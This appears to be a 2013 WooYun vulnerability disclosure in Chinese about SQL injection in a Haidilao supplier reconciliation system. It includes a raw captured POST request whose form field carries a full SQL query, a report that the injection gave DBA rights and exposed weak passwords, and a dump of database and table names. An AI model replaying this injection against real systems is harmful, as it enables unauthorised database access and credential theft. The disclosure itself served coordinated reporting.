当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-033223

漏洞标题:海底捞某重要系统高权限SQL注射导致沦陷

相关厂商:haidilao.com

漏洞作者: 小胖子

提交时间:2013-08-02 09:11

修复时间:2013-09-16 09:12

公开时间:2013-09-16 09:12

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-08-02: 细节已通知厂商并且等待厂商处理中
2013-08-02: 厂商已经确认,细节仅向厂商公开
2013-08-12: 细节向核心白帽子及相关领域专家公开
2013-08-22: 细节向普通白帽子公开
2013-09-01: 细节向实习白帽子公开
2013-09-16: 细节向公众公开

简要描述:

又是越权引起的,能越权的,你们基本不过滤,这下惨了哇。
不想吃海底捞的黑客不是好领班。

详细说明:

系统:在线对账系统http://duizhang.haidilao.com/
这个就比较重要了吧。
然后呢,发现还是比较严格的:

1)供应商请注意:您用户名 前5位为 00000,
2)10分钟内连续输入5此错误密码,用户名自动锁定
3)被锁定之前,请点击忘记密码用邮件找回!
4)请尽快在个人资料和个人密码中维护邮箱和密码回答问题


看起来很严格,爆破是不可能了,但是,防不胜防啊。
发现一个地址。
http://duizhang.haidilao.com/log.aspx
打开一看,越权查看,还是好多信息的。

.jpg


然后呢,随便在搜索处加个单引号就报错了。

报错.jpg


然后呢,果断抓包。

POST /log.aspx HTTP/1.1
Host: duizhang.haidilao.com
Proxy-Connection: keep-alive
Content-Length: 4785
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://duizhang.haidilao.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31
Content-Type: application/x-www-form-urlencoded
Referer: http://duizhang.haidilao.com/log.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ezn0twltmlmhzptvkxzzubux
__VIEWSTATE=%2FwEPDwUKMTQ4NTkwODY2Nw9kFgICAw9kFgICCQ88KwARAgAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCB2QBEBYAFgAWABYCZg9kFhICAQ9kFgZmD2QWAmYPFQEBMWQCAQ8PFgIeBFRleHQFETIwMTMtOC0xIDEzOjM2OjUwZGQCAg8PFgIfAgXGAuWQjOatpVsyMDEzLTA3LTMxXeaVsOaNrueJh%2BWMuuiuouWNleOAkDEzLTI2LS0mZ3Q7MTMtMzbjgJHvvJo2NjnkuKo75oqT5Y%2BWc2Fw5p2h5pWwNjc35Liq44CQ57O757uf6KOF566xNjY55LiqLOiuvue9ruWIoOmZpDjkuKrjgJHjgII757O757uf5L%2Bd5a2Y5oiQ5YqfNjY55p2h77yB54mH5Yy65YWl5bqT6K6i5Y2V44CQMTMtMzYtLSZndDsxMy0zNuOAke%2B8mjI3MjnkuKo7c2Fw5oqT5Y%2BW5p2h5pWwMjcyOeS4qizlpITnkIblkI7mnaHmlbAyNzI55LiqO%2Bezu%2Be7n%2BaWsOWinjI3MjnkuKo75paw5aKe5aSx6LSlMOS4qjvmjpLpmaTku6XkuIvljZXmja7kuI3lkIzmraXvvJo7FgIeBXN0eWxlBRV3b3JkLWJyZWFrOmJyZWFrLWFsbDtkAgIPZBYGZg9kFgJmDxUBATJkAgEPDxYCHwIFETIwMTMtOC0xIDEyOjM3OjU0ZGQCAg8PFgIfAgXGAuWQjOatpVsyMDEzLTA3LTMxXeaVsOaNrueJh%2BWMuuiuouWNleOAkDEyLTI2LS0mZ3Q7MTItMzfjgJHvvJo2NjnkuKo75oqT5Y%2BWc2Fw5p2h5pWwNjc35Liq44CQ57O757uf6KOF566xNjY55LiqLOiuvue9ruWIoOmZpDjkuKrjgJHjgII757O757uf5L%2Bd5a2Y5oiQ5YqfNjY55p2h77yB54mH5Yy65YWl5bqT6K6i5Y2V44CQMTItMzctLSZndDsxMi0zN%2BOAke%2B8mjI3MjnkuKo7c2Fw5oqT5Y%2BW5p2h5pWwMjcyOeS4qizlpITnkIblkI7mnaHmlbAyNzI55LiqO%2Bezu%2Be7n%2BaWsOWinjI3MjnkuKo75paw5aKe5aSx6LSlMOS4qjvmjpLpmaTku6XkuIvljZXmja7kuI3lkIzmraXvvJo7FgIfAwUVd29yZC1icmVhazpicmVhay1hbGw7ZAIDD2QWBmYPZBYCZg8VAQEzZAIBDw8WAh8CBREyMDEzLTgtMSAxMTo0MDozNGRkAgIPDxYCHwIFxgLlkIzmraVbMjAxMy0wNy0zMV3mlbDmja7niYfljLrorqLljZXjgJAxMS0yOC0tJmd0OzExLTM544CR77yaNjY55LiqO%2BaKk%2BWPlnNhcOadoeaVsDY3N%2BS4quOAkOezu%2Be7n%2BijheeusTY2OeS4qizorr7nva7liKDpmaQ45Liq44CR44CCO%2Bezu%2Be7n%2BS%2FneWtmOaIkOWKnzY2Oeadoe%2B8geeJh%2BWMuuWFpeW6k%2BiuouWNleOAkDExLTM5LS0mZ3Q7MTEtNDDjgJHvvJoyNzI55LiqO3NhcOaKk%2BWPluadoeaVsDI3MjnkuKos5aSE55CG5ZCO5p2h5pWwMjcyOeS4qjvns7vnu5%2FmlrDlop4yNzI55LiqO%2BaWsOWinuWksei0pTDkuKo75o6S6Zmk5Lul5LiL5Y2V5o2u5LiN5ZCM5q2l77yaOxYCHwMFFXdvcmQtYnJlYWs6YnJlYWstYWxsO2QCBA9kFgZmD2QWAmYPFQEBNGQCAQ8PFgIfAgURMjAxMy04LTEgMTA6MzI6MzVkZAICDw8WAh8CBcYC5ZCM5q2lWzIwMTMtMDctMzFd5pWw5o2u54mH5Yy66K6i5Y2V44CQMTAtMjAtLSZndDsxMC0zMeOAke%2B8mjY2OeS4qjvmipPlj5ZzYXDmnaHmlbA2NzfkuKrjgJDns7vnu5%2Foo4XnrrE2NjnkuKos6K6%2B572u5Yig6ZmkOOS4quOAkeOAgjvns7vnu5%2Fkv53lrZjmiJDlip82NjnmnaHvvIHniYfljLrlhaXlupPorqLljZXjgJAxMC0zMS0tJmd0OzEwLTMy44CR77yaMjcyOeS4qjtzYXDmipPlj5bmnaHmlbAyNzI55LiqLOWkhOeQhuWQjuadoeaVsDI3MjnkuKo757O757uf5paw5aKeMjcyOeS4qjvmlrDlop7lpLHotKUw5LiqO%2BaOkumZpOS7peS4i%2BWNleaNruS4jeWQjOatpe%2B8mjsWAh8DBRV3b3JkLWJyZWFrOmJyZWFrLWFsbDtkAgUPZBYGZg9kFgJmDxUBATVkAgEPDxYCHwIFEDIwMTMtOC0xIDI6NDA6MjVkZAICDw8WAh8CBcYC5ZCM5q2lWzIwMTMtMDctMzFd5pWw5o2u54mH5Yy66K6i5Y2V44CQMDItMjgtLSZndDswMi0zOeOAke%2B8mjY2OeS4qjvmipPlj5ZzYXDmnaHmlbA2NzfkuKrjgJDns7vnu5%2Foo4XnrrE2NjnkuKos6K6%2B572u5Yig6ZmkOOS4quOAkeOAgjvns7vnu5%2Fkv53lrZjmiJDlip82NjnmnaHvvIHniYfljLrlhaXlupPorqLljZXjgJAwMi0zOS0tJmd0OzAyLTQw44CR77yaMjcyOeS4qjtzYXDmipPlj5bmnaHmlbAyNzI55LiqLOWkhOeQhuWQjuadoeaVsDI3MjnkuKo757O757uf5paw5aKeMjcyOeS4qjvmlrDlop7lpLHotKUw5LiqO%2BaOkumZpOS7peS4i%2BWNleaNruS4jeWQjOatpe%2B8mjsWAh8DBRV3b3JkLWJyZWFrOmJyZWFrLWFsbDtkAgYPZBYGZg9kFgJmDxUBATZkAgEPDxYCHwIFEDIwMTMtOC0xIDE6NTE6MzRkZAICDw8WAh8CBcYC5ZCM5q2lWzIwMTMtMDctMzFd5pWw5o2u54mH5Yy66K6i5Y2V44CQMDEtNDEtLSZndDswMS01MOOAke%2B8mjY2OeS4qjvmipPlj5ZzYXDmnaHmlbA2NzfkuKrjgJDns7vnu5%2Foo4XnrrE2NjnkuKos6K6%2B572u5Yig6ZmkOOS4quOAkeOAgjvns7vnu5%2Fkv53lrZjmiJDlip82NjnmnaHvvIHniYfljLrlhaXlupPorqLljZXjgJAwMS01MC0tJmd0OzAxLTUx44CR77yaMjcyOeS4qjtzYXDmipPlj5bmnaHmlbAyNzI55LiqLOWkhOeQhuWQjuadoeaVsDI3MjnkuKo757O757uf5paw5aKeMjcyOeS4qjvmlrDlop7lpLHotKUw5LiqO%2BaOkumZpOS7peS4i%2BWNleaNruS4jeWQjOatpe%2B8mjsWAh8DBRV3b3JkLWJyZWFrOmJyZWFrLWFsbDtkAgcPZBYGZg9kFgJmDxUBATdkAgEPDxYCHwIFEDIwMTMtOC0xIDA6MTc6MDRkZAICDw8WAh8CBcYC5ZCM5q2lWzIwMTMtMDctMzFd5pWw5o2u54mH5Yy66K6i5Y2V44CQMDAtMDItLSZndDswMC0xNuOAke%2B8mjY2OeS4qjvmipPlj5ZzYXDmnaHmlbA2NzfkuKrjgJDns7vnu5%2Foo4XnrrE2NjnkuKos6K6%2B572u5Yig6ZmkOOS4quOAkeOAgjvns7vnu5%2Fkv53lrZjmiJDlip82NjnmnaHvvIHniYfljLrlhaXlupPorqLljZXjgJAwMC0xNi0tJmd0OzAwLTE344CR77yaMjcyOeS4qjtzYXDmipPlj5bmnaHmlbAyNzI55LiqLOWkhOeQhuWQjuadoeaVsDI3MjnkuKo757O757uf5paw5aKeMjcyOeS4qjvmlrDlop7lpLHotKUw5LiqO%2BaOkumZpOS7peS4i%2BWNleaNruS4jeWQjOatpe%2B8mjsWAh8DBRV3b3JkLWJyZWFrOmJyZWFrLWFsbDtkAggPDxYCHgdWaXNpYmxlaGRkAgkPDxYCHwRoZGQYAQUIZ3JpZFZpZXcPPCsADAEIAgFkiu%2FFRkf4GqscekywiYKZ5eJAFRvy5zAYQwPriBzK5CE%3D&__EVENTVALIDATION=%2FwEWCQLxr9G2AgLGz8WcCQLKoNWwCwL1jPXhAgKln%2FPuCgKd9rqDDAKkotGkBQK4teTSDAKthMSGBHWTZGiy63vMMMaHA0Uy8XiwkA9QjQ1nSY4smVEGS3tL&tbxDateFrom=2013-08-01&tbxDateTo=2013-08-01&tbxMSG=&btnSearch=%E6%90%9C%E7%B4%A2&s_Action=&s_sqlAll=select+top+1000+log_datetime%2Cmsg+from+log++where+msg+like+%27%25%E5%90%8C%E6%AD%A5%25%27++and+log_datetime+%3E%3D+%272013-08-01%27+and+log_datetime+%3C%3D+%272013-08-01+23%3A59%3A59%27+order+by+log_datetime+desc&s_Search=+and+log_datetime+%3E%3D+%272013-08-01%27+and+log_datetime+%3C%3D+%272013-08-01+23%3A59%3A59%27&hidTemp=


post注射看看。

DBA.jpg


发现权限挺高的,DBA。注射速度也是一流的。
注射出很多弱口令啊,这下继续渗透你们就能摸准你们的习惯了。

.jpg


然后进入系统:

.jpg


然后,好多信息啊,卧槽

.jpg


over。

漏洞证明:

available databases [10]:
[*] dtest
[*] duizhang
[*] hetong
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] test1


Database: duizhang
[43 tables]
+------------------------------------+
| dbo.BILL_DRAFT                     |
| dbo.BILL_FLOW_STACK                |
| dbo.BILL_FLOW_STATE_COM            |
| dbo.BILL_RELATION                  |
| dbo.Budget_BillLeave               |
| dbo.DOC_ISSUE                      |
| dbo.DOC_MIND                       |
| dbo.DOC_TEMPLATE                   |
| dbo.EVENTS                         |
| dbo.FLOWBASE                       |
| dbo.FLOW_LIST                      |
| dbo.HEADSHIP                       |
| dbo.HS_CASH_INIT                   |
| dbo.HS_POSITION                    |
| dbo.HS_SHIP                        |
| dbo.IDFACTORY                      |
| dbo.IDFACTORY2                     |
| dbo.R_ContractInfo                 |
| dbo.R_GatherInfo                   |
| dbo.R_Invoice                      |
| dbo.R_ProjPlanDoc                  |
| dbo.R_ProjectDetail                |
| dbo.R_ProjectJob                   |
| dbo.R_ProjectJobLog                |
| dbo.R_ProjectLog                   |
| dbo.R_ProjectMember                |
| dbo.R_ProjectPhase                 |
| dbo.R_ProjectProblem               |
| dbo.R_Relation_Order               |
| dbo.SUBJECT                        |
| dbo.USER_INFO                      |
| dbo.aspnet_Membership              |
| dbo.aspnet_Paths                   |
| dbo.aspnet_PersonalizationAllUsers |
| dbo.aspnet_PersonalizationPerUser  |
| dbo.aspnet_Profile                 |
| dbo.aspnet_Roles                   |
| dbo.aspnet_Users                   |
| dbo.aspnet_UsersInRoles            |
| dbo.budget_plan_sum_bgt            |
| dbo.v_hdl_order                    |
| dbo.v_hdl_order_special            |
| dbo.v_hdl_receieved_bill           |
+------------------------------------+

修复方案:

0x1:越权切不可发生。
0x2:注射好好过滤。
0x3:数据库权限太高,hetong这个库是合同?这么不小心!!
0x4:四川老乡,20rank拿来,礼物拿来,海底捞免费券!!!!!

版权声明:转载请注明来源 小胖子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-08-02 10:02

厂商回复:

感谢您提报的漏洞,我们正在努力修复;

最新状态:

暂无